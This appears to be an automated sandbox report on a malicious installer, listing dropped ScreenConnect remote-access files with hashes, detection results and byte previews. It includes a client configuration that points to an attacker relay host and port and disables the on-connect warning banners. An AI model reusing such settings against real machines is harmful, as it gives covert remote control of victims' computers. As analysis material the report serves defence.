                                                                                  Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.q...'..6....wp.......y....C|.)>..Ldt..... $...X..........1$.../...2.%%3./>>...L.y.0.C._.........1Y..Qj.o....<....=...R..;...C....&.......1p2.r.x.u?Y..R...c......X.....I.5.2q..R...>.E.pw .@ ).w.l.....S...X..'.C.I......-.Y........4.J..P<.E..=c!.@To..#.._.2.....K.!..h...z......t......^..4...D...f..Q...:..%.z.<......^.....;<...r..yC.....Q........4_.Sns..z.......=..]t...X..<....8.e`}..n....S.H[..S@?.~....,...j.2..*v.......B....A...a......D..c..w..K,..t...S.....*v....7.6|..&.....r....#....G......Y...i..'.............'.......Z.....#2e..........|....)..%....A.....4{..u;N......&q...}.tD..x.....4...J...L......5.Q..M....K..3U..M..............5...........t.>.......lYu....3TY.?...r...'.......3.m........=.H...#.o.........n.....,4.~...<h..u...i.H...V......V/...P.$%..z...
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):26722
                                                                                  Entropy (8bit):7.7401940386372345
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
                                                                                  MD5:5CD580B22DA0C33EC6730B10A6C74932
                                                                                  SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                                                                  SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                                                                  SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                                                                  Malicious:false
                                                                                  Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..*B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..*D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):197120
                                                                                  Entropy (8bit):6.58476728626163
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:CxGtNaldxI5KY9h12QMusqVFJRJcyzvJquFzDvJXYrR:BtNalc5fr12QbPJYaquFGr
                                                                                  MD5:AE0E6EBA123683A59CAE340C894260E9
                                                                                  SHA1:35A6F5EB87179EB7252131A881A8D5D4D9906013
                                                                                  SHA-256:D37F58AAE6085C89EDD3420146EB86D5A108D27586CB4F24F9B580208C9B85F1
                                                                                  SHA-512:1B6D4AD78C2643A861E46159D5463BA3EC5A23A2A3DE1575E22FDCCCD906EE4E9112D3478811AB391A130FA595306680B8608B245C1EECB11C5BCE098F601D6B
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Joe Sandbox View:
                                                                                  • Filename: extukGiBrn.exe, Detection: malicious, Browse
                                                                                  • Filename: Vh0tTzx4Ko.exe, Detection: malicious, Browse
                                                                                  • Filename: support.Client.exe, Detection: malicious, Browse
                                                                                  • Filename: support.Client.exe, Detection: malicious, Browse
                                                                                  • Filename: ScreenConnect.ClientSetup (1).exe, Detection: malicious, Browse
                                                                                  • Filename: ScreenConnect.ClientSetup (1).exe, Detection: malicious, Browse
                                                                                  • Filename: Scan_doc_09_16_24_1120.exe, Detection: malicious, Browse
                                                                                  • Filename: E_BILL9926378035.exe, Detection: malicious, Browse
                                                                                  • Filename: Scan_doc_09_16_24_1203.exe, Detection: malicious, Browse
                                                                                  • Filename: E_BILL0041272508.exe, Detection: malicious, Browse
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z<..........." ..0.................. ... ....... .......................`............@.................................-...O.... .......................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................a.......H...........(............^................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*..{....*:.(......}....*.0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o....*....0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=...*..0...........~*...%-.&~).....|...s&...%.*...(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):68096
                                                                                  Entropy (8bit):6.068776675019683
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:tA0ZscQ5V6TsQqoSDKh6+39QFVIl1KJhb8gp:q0Zy3wUOQFVQKJp
                                                                                  MD5:0402CF8AE8D04FCC3F695A7BB9548AA0
                                                                                  SHA1:044227FA43B7654032524D6F530F5E9B608E5BE4
                                                                                  SHA-256:C76F1F28C5289758B6BD01769C5EBFB519EE37D0FA8031A13BB37DE83D849E5E
                                                                                  SHA-512:BE4CBC906EC3D189BEBD948D3D44FCF7617FFAE4CC3C6DC49BF4C0BD809A55CE5F8CD4580E409E5BCE7586262FBAF642085FA59FE55B60966DB48D81BA8C0D78
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Joe Sandbox View:
                                                                                  • Filename: extukGiBrn.exe, Detection: malicious, Browse
                                                                                  • Filename: Vh0tTzx4Ko.exe, Detection: malicious, Browse
                                                                                  • Filename: support.Client.exe, Detection: malicious, Browse
                                                                                  • Filename: support.Client.exe, Detection: malicious, Browse
                                                                                  • Filename: ScreenConnect.ClientSetup (1).exe, Detection: malicious, Browse
                                                                                  • Filename: ScreenConnect.ClientSetup (1).exe, Detection: malicious, Browse
                                                                                  • Filename: Scan_doc_09_16_24_1120.exe, Detection: malicious, Browse
                                                                                  • Filename: E_BILL9926378035.exe, Detection: malicious, Browse
                                                                                  • Filename: Scan_doc_09_16_24_1203.exe, Detection: malicious, Browse
                                                                                  • Filename: E_BILL0041272508.exe, Detection: malicious, Browse
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.T..........." ..0.............. ... ...@....... ..............................d.....@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*.~,...%-.&~+.....i...s....%.,...(...+*vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):95520
                                                                                  Entropy (8bit):6.505346220942731
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:rg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoT0HMM7CxM7:khbNDxZGXfdHrX7rAc6myJkgoT0HXN7
                                                                                  MD5:361BCC2CB78C75DD6F583AF81834E447
                                                                                  SHA1:1E2255EC312C519220A4700A079F02799CCD21D6
                                                                                  SHA-256:512F9D035E6E88E231F082CC7F0FF661AFA9ACC221CF38F7BA3721FD996A05B7
                                                                                  SHA-512:94BA891140E7DDB2EFA8183539490AC1B4E51E3D5BD0A4001692DD328040451E6F500A7FC3DA6C007D9A48DB3E6337B252CE8439E912D4FE7ADC762206D75F44
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.......................................@.................................p...x....`..X............L.. )...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...X....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):548864
                                                                                  Entropy (8bit):6.031251664661689
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
                                                                                  MD5:16C4F1E36895A0FA2B4DA3852085547A
                                                                                  SHA1:AB068A2F4FFD0509213455C79D311F169CD7CAB8
                                                                                  SHA-256:4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
                                                                                  SHA-512:AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z............." ..0..X...........r... ........... ...............................D....@..................................r..O....................................q..8............................................ ............... ..H............text....V... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................r......H........B......................xq........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):1721856
                                                                                  Entropy (8bit):6.639136400085158
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
                                                                                  MD5:9F823778701969823C5A01EF3ECE57B7
                                                                                  SHA1:DA733F482825EC2D91F9F1186A3F934A2EA21FA1
                                                                                  SHA-256:ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
                                                                                  SHA-512:FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............" ..0..>...........]... ...`....... ..............................[.....@................................./]..O....`...............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............D..............@..B................c]......H.......t...h..............0....\........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):260168
                                                                                  Entropy (8bit):6.416438906122177
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:qJvChyA4m2zNGvxDd6Q6dtaVNVrlaHpFahvJ9ERnWtMG8Ff2lt9Bgcld5aaYxg:0IvxDdL6d8VNdlC3g0RCXh5D
                                                                                  MD5:5ADCB5AE1A1690BE69FD22BDF3C2DB60
                                                                                  SHA1:09A802B06A4387B0F13BF2CDA84F53CA5BDC3785
                                                                                  SHA-256:A5B8F0070201E4F26260AF6A25941EA38BD7042AEFD48CD68B9ACF951FA99EE5
                                                                                  SHA-512:812BE742F26D0C42FDDE20AB4A02F1B47389F8D1ACAA6A5BB3409BA27C64BE444AC06D4129981B48FA02D4C06B526CB5006219541B0786F8F37CF2A183A18A73
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A........................T....................V.......V.......V......................=U......=U......=U$.....=U......Rich....................PE..d.....Qf.........." ...'.^...^.......................................................(....`..........................................e.......f..P................ ......HP..........P%..p............................$..@............p...............................text...t].......^.................. ..`.rdata.......p.......b..............@..@.data....+...........d..............@....pdata... ......."...x..............@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):61216
                                                                                  Entropy (8bit):6.31175789874945
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:SW/+lo6MOc8IoiKWjbNv8DtyQ4RE+TC6VAhVbIF7fIxp:SLlo6dccl9yQGVtFra
                                                                                  MD5:6DF2DEF5E591E2481E42924B327A9F15
                                                                                  SHA1:38EAB6E9D99B5CAEEC9703884D25BE8D811620A9
                                                                                  SHA-256:B6A05985C4CF111B94A4EF83F6974A70BF623431187691F2D4BE0332F3899DA9
                                                                                  SHA-512:5724A20095893B722E280DBF382C9BFBE75DD4707A98594862760CBBD5209C1E55EEAF70AD23FA555D62C7F5E54DE1407FB98FC552F42DCCBA5D60800965C6A5
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L............."...0.................. ........@.. ....................... ......3]....@.....................................O.......,............... )..............8............................................ ............... ..H............text........ ...................... ..`.rsrc...,...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....*^.(.......a...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!...*...0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):266
                                                                                  Entropy (8bit):4.842791478883622
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                  MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                  SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                  SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                  SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):601376
                                                                                  Entropy (8bit):6.185921191564225
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:r+z3H0n063rDHWP5hLG/6XixJQm16Eod7ZeYai1FzJTZJ5BCEOG6y9QsZSc4F2/Q:qzEjrTWPMLBfWFaSdJ5BeG6xs6/yRod
                                                                                  MD5:20AB8141D958A58AADE5E78671A719BF
                                                                                  SHA1:F914925664AB348081DAFE63594A64597FB2FC43
                                                                                  SHA-256:9CFD2C521D6D41C3A86B6B2C3D9B6A042B84F2F192F988F65062F0E1BFD99CAB
                                                                                  SHA-512:C5DD5ED90C516948D3D8C6DFA3CA7A6C8207F062883BA442D982D8D05A7DB0707AFEC3A0CB211B612D04CCD0B8571184FC7E81B2E98AE129E44C5C0E592A5563
                                                                                  Malicious:true
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{<............"...0.................. ... ....@.. .......................`.......x....@.................................=...O.... .................. )...@..........8............................................ ............... ..H............text...`.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................q.......H........H................................................................{D...*..{E...*V.(F.....}D.....}E...*...0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...*.*.*. }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X*...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N...*..{O...*..{P...*V.(F.....}O.....}P...*.0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...*.*.*. 1.c. )UU.
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):266
                                                                                  Entropy (8bit):4.842791478883622
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                  MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                  SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                  SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                  SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                  Malicious:true
                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):842248
                                                                                  Entropy (8bit):6.268561504485627
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:q9vy8YABMuiAoPyEIrJs7jBjaau+EAaMVtw:P8Y4MuiAoPyZrJ8jrvDVtw
                                                                                  MD5:BE74AB7A848A2450A06DE33D3026F59E
                                                                                  SHA1:21568DCB44DF019F9FAF049D6676A829323C601E
                                                                                  SHA-256:7A80E8F654B9DDB15DDA59AC404D83DBAF4F6EAFAFA7ECBEFC55506279DE553D
                                                                                  SHA-512:2643D649A642220CEEE121038FE24EA0B86305ED8232A7E5440DFFC78270E2BDA578A619A76C5BB5A5A6FE3D9093E29817C5DF6C5DD7A8FBC2832F87AA21F0CC
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}....}H..}H..}H.d~I..}H.dxIG.}H.dyI..}H..xI..}H..yI..}H..~I..}H..|H8.}H..}H..}H2.}I..}H2..I..}HRich..}H........PE..d.....Gf.........." ...'.P...........H....................................... ......q.....`......................................... ...t....................P...y.......(......,4.....T.......................(.......@............`...............................text....O.......P.................. ..`.rdata...z...`...|...T..............@..@.data....d.......0..................@....pdata...y...P...z..................@..@_RDATA...............z..............@..@.reloc..,4.......6...|..............@..B................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):81696
                                                                                  Entropy (8bit):5.862223562830496
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:/tytl44RzbwI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7Yp7gxd:8/KukLdUpc
                                                                                  MD5:B1799A5A5C0F64E9D61EE4BA465AFE75
                                                                                  SHA1:7785DA04E98E77FEC7C9E36B8C68864449724D71
                                                                                  SHA-256:7C39E98BEB59D903BC8D60794B1A3C4CE786F7A7AAE3274C69B507EBA94FAA80
                                                                                  SHA-512:AD8C810D7CC3EA5198EE50F0CEB091A9F975276011B13B10A37306052697DC43E58A16C84FA97AB02D3927CD0431F62AEF27E500030607828B2129F305C27BE8
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P............"...0..@...........^... ...`....@.. .......................`......j.....@..................................^..O....`.. ............... )...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc... ....`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(*........(+...o,...(-...t....
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):266
                                                                                  Entropy (8bit):4.842791478883622
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                  MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                  SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                  SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                  SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):3343
                                                                                  Entropy (8bit):4.771733209240506
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:o3H52H82HzHAHyHVHeHMHZHUH1HyHkHlHgHyHNHtH29PtxA2oFHX:opPN
                                                                                  MD5:9322751577F16A9DB8C25F7D7EDD7D9F
                                                                                  SHA1:DC74AD5A42634655BCBA909DB1E2765F7CDDFB3D
                                                                                  SHA-256:F1A3457E307D721EF5B63FDB0D5E13790968276862EF043FB62CCE43204606DF
                                                                                  SHA-512:BB0C662285D7B95B7FAA05E9CC8675B81B33E6F77B0C50F97C9BC69D30FB71E72A7EAF0AFC71AF0C646E35B9EADD1E504A35D5D25847A29FD6D557F7ABD903AB
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ShowFeedbackSurveyForm" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>fa
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with very long lines (449), with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):939
                                                                                  Entropy (8bit):5.796466792414452
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:2dL9hK6E4dl/nuuAnCiCBrxKrlI3ZXfePI9Rp3vH:chh7HHnDAnCPrxKa3lff3v
                                                                                  MD5:10ACBCF7D80CC0D8D0D67FF0987D0189
                                                                                  SHA1:00E379C7CDFAB98198FFEF891BAD17231262CF66
                                                                                  SHA-256:4A4C00DA35C8FB61FF854E9D9916E74CE0433DEC574673C41D70A9374C5C7636
                                                                                  SHA-512:6ABBA073E467B6152A6B828B8E07BBC4794656CA6F040CE0D132A717CA483A9E7756B7EDBD414AC9A4A032D31FC1570DE72855A7F35386CB1AE90BC890A1CCD9
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ClientLaunchParametersConstraint" serializeAs="String">.. <value>?h=yell64u.top&amp;p=8880&amp;k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):746
                                                                                  Entropy (8bit):5.349174276064173
                                                                                  Encrypted:false
